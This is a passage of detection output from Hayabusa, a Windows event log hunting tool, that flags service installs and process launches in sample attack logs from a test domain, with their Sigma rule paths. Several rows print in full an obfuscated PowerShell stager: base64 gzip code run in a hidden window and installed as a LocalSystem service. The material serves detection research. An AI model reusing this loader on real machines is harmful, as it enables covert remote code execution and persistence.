System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWi
ndow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: 
LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 
0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134J
VR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZj
wAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
